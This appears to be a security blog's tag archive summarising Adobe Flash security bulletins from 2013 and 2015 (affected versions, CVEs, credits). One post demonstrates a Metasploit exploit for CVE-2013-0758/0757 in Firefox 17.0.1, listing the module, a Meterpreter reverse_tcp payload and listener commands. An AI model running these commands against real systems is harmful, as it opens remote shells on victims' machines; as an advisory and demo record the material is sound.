Tag Archives: Adobe

APSB15-32 – Adobe Flash December 2015 Security Bulletin Review

On December 8th 2015, during its December Patch Tuesday, Adobe released one Adobe Flash security bulletin dealing with 77 vulnerabilities. This security bulletin has a Critical severity rating.

APSB15-32 affects:

  • Adobe Flash Player Desktop Runtime 19.0.0.245 and earlier on Windows and Macintosh
  • Adobe Flash Player Extended Support Release 18.0.0.261 and earlier on Windows and Macintosh
  • Adobe Flash Player for Google Chrome 19.0.0.245 and earlier on Windows, Macintosh, Linux and ChromeOS
  • Adobe Flash Player for Microsoft Edge and Internet Explorer 11 19.0.0.245 and earlier on Windows 10
  • Adobe Flash Player for Internet Explorer 10 and 11 19.0.0.245 and earlier on Windows 8.0 and 8.1
  • Adobe Flash Player for Linux 11.2.202.548 and earlier on Linux
  • AIR Desktop Runtime 19.0.0.241 and earlier on Windows and Macintosh
  • AIR SDK 19.0.0.241 and earlier on Windows, Macintosh, Android and iOS
  • AIR SDK & Compiler 19.0.0.241 and earlier on Windows, Macintosh, Android and iOS
  • AIR for Android

APSB13-16 – Adobe Flash June 2013 Security Bulletin Review

On June 11th 2013, during its June Patch Tuesday, Adobe released one Adobe Flash security bulletin dealing with one vulnerability. This security bulletin has a Critical severity rating. The associated vulnerability has a 10.0 CVSS base score.

APSB13-16 affects:

  • Adobe Flash Player 11.7.700.202 and earlier versions for Windows
  • Adobe Flash Player 11.7.700.203 and earlier versions for Macintosh
  • Adobe Flash Player 11.2.202.285 and earlier versions for Linux
  • Adobe Flash Player 11.1.115.58 and earlier versions for Android 4.x
  • Adobe Flash Player 11.1.111.54 and earlier versions for Android 3.x and 2.x
  • Adobe AIR 3.7.0.1860 and earlier versions for Windows and Macintosh
  • Adobe AIR 3.7.0.1860 and earlier versions for Android
  • Adobe AIR 3.7.0.1860 SDK & Compiler and earlier versions

CVE-2013-3343 (10.0 CVSS base score) was discovered and privately reported by Mateusz Jurczyk and Ben Hawkes of the Google Security Team.

Firefox 17.0.1 + Flash Privileged Code Injection Metasploit Demo

Timeline:

Vulnerability discovered and reported to vendor by Marius Mlynski on 2012-11-21
Vulnerability corrected by vendor on 2013-01-08
Metasploit PoC provided on 2013-05-15

PoC provided by:

Marius Mlynski
joev
sinn3r

Reference(s):

CVE-2013-0758
CVE-2013-0757
MFSA-2013-15

Affected version(s):

Firefox 17.0.1 and previous

Tested on Windows 7 SP1 with:

Firefox 17.0.1

Description:

This exploit gains remote code execution on Firefox 17.0.1 and all previous versions, provided the user has installed Flash. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG “use” element in the (CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper around the child frame’s window reference and inject code into the chrome:// context. Once we have injection into the chrome execution context, we can write the payload to disk, chmod it (if posix), and then execute. Note: Flash is used here to trigger the exploit but any Firefox plugin with script access should be able to trigger it.

Commands:

use exploit/multi/browser/firefox_svg_plugin
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

APSB13-14 – Adobe Flash May 2013 Security Bulletin Review

On May 14th 2013, during its May Patch Tuesday, Adobe released one Adobe Flash security bulletin dealing with 13 vulnerabilities. This security bulletin has a Critical severity rating. The associated vulnerabilities all have a 10.0 CVSS base score.

APSB13-14 affects:

  • Adobe Flash Player 11.7.700.169 and earlier versions for Windows and Macintosh
  • Adobe Flash Player 11.2.202.280 and earlier versions for Linux
  • Adobe Flash Player 11.1.115.54 and earlier versions for Android 4.x
  • Adobe Flash Player 11.1.111.50 and earlier versions for Android 3.x and 2.x
  • Adobe AIR 3.7.0.1530 and earlier versions for Windows and Macintosh
  • Adobe AIR 3.7.0.1660 and earlier versions for Android
  • Adobe AIR 3.7.0.1530 SDK & Compiler and earlier versions

CVE-2013-2728 (10.0 CVSS base score), CVE-2013-3324 (10.0 CVSS base score), CVE-2013-3325 (10.0 CVSS base score), CVE-2013-3326 (10.0 CVSS base score), CVE-2013-3327 (10.0 CVSS base score), CVE-2013-3328 (10.0 CVSS base score), CVE-2013-3329 (10.0 CVSS base score), CVE-2013-3330 (10.0 CVSS base score), CVE-2013-3331 (10.0 CVSS base score) and CVE-2013-3332 (10.0 CVSS base score) were discovered and privately reported by Mateusz Jurczyk and Ben Hawkes of the Google Security Team.

CVE-2013-3333 (10.0 CVSS base score), CVE-2013-3334 (10.0 CVSS base score) and CVE-2013-3335 (10.0 CVSS base score) were discovered and privately reported by Mateusz Jurczyk, Gynvael Coldwind, and Fermin Serna of the Google Security Team.